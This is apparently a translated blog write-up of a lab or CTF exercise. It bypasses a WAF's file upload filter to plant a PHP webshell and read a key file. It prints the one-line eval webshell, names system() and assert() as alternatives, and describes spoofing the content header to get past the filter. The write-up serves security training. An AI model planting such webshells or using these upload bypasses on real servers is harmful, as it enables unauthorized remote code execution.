当前位置:网站首页>File upload question type
File upload question type
2022-06-13 08:17:00 【BT youth】
subject : Through what you have learned , Test its passing WAF Filter rule , Break through uploading to get webshell, The answer is in the root directory key.php In file .
Upload first 1.php file , Inside the preparation of a sentence Trojan horse :<?php eval($_POST[c]);?>
1、 Get content by grabbing packets , It is found that the upload failed

2、 Bypass uploading by suffix : Failure

3、 Bypass by content header : success ( It may also be shielded eval function , Use system Function or assert() function )

Go to the upload path :http://192.168.129.128:82/vulnerabilities/1.phtml

Use the ant sword webshell Connect :http://192.168.129.128:82/vulnerabilities/1.phtml

Get into webshell Background management interface :

Get key.php value ;
Another way :
1、 Upload system() Function to view the file in the current path


2、 View the files in the upper level directory , Find out key.php file


3、 Open the upper level directory key.php file , find key value


边栏推荐
- 【PYTORCH】RuntimeError: one of the variables needed for gradient computation has been
- Which is the stronger fresh food distribution and sorting management system?
- 实践出真知--你的字节对齐和堆栈认知可能是错误的
- Introduction to dfinity (ICP) -1
- Install cuda+cusp environment and create the first helloword starter project
- Operation of simulated examination platform for examination question bank of G3 boiler water treatment operation certificate in 2022
- SolidWorks修改工程图中文字字体的方法
- Dfinity (ICP) identity authentication and ledger quick start-3
- Overview of cross chain protocol IBC
- Openharmony notes ----------- (I)
猜你喜欢

ERP basic data concept

适合生鲜批发行业的几种精准接单方式

Dfinity (ICP) basic development tutorial-5

ERP basic data Huaxia

Did decentralized digital identity

26 | superscalar and VLIW: how to make the CPU throughput exceed 1

Microservice system architecture construction I: Environment Construction

【PYTORCH】Expected object of type torch. xxxTensor but found type torch. cuda. xxxTensor(torch0.4.0)

How does the BD new tab plug-in log in?

ERP基础数据 华夏
随机推荐
ERP basic data Kingdee
【完全信息静态博弈-Nash均衡的特性】
EHD ether coin, the hottest dpoc mining project
Methods of importing and exporting settings in Altium Designer
Shell脚本常用开发规范
CCNP_ Bt- Reissue
How to efficiently manage commodities and inventory in the beverage wholesale industry
疫情之下的远程办公解决方案
Cosmos star application case
生鲜配送分拣管理系统哪家比较强?
水仙花升级版(自幂数)
Go 接口实现原理【高阶篇】: type _interface struct
P7712 [Ynoi2077] hlcpq
2022起重机械指挥考试题模拟考试题库及在线模拟考试
Microservice Project Construction II: database design
MySQL installation and configuration under Windows
名次的确定
How to dynamically delete data rows in a table through JS (keep the head)
Redis interview questions
Introduction to dfinity (ICP) -1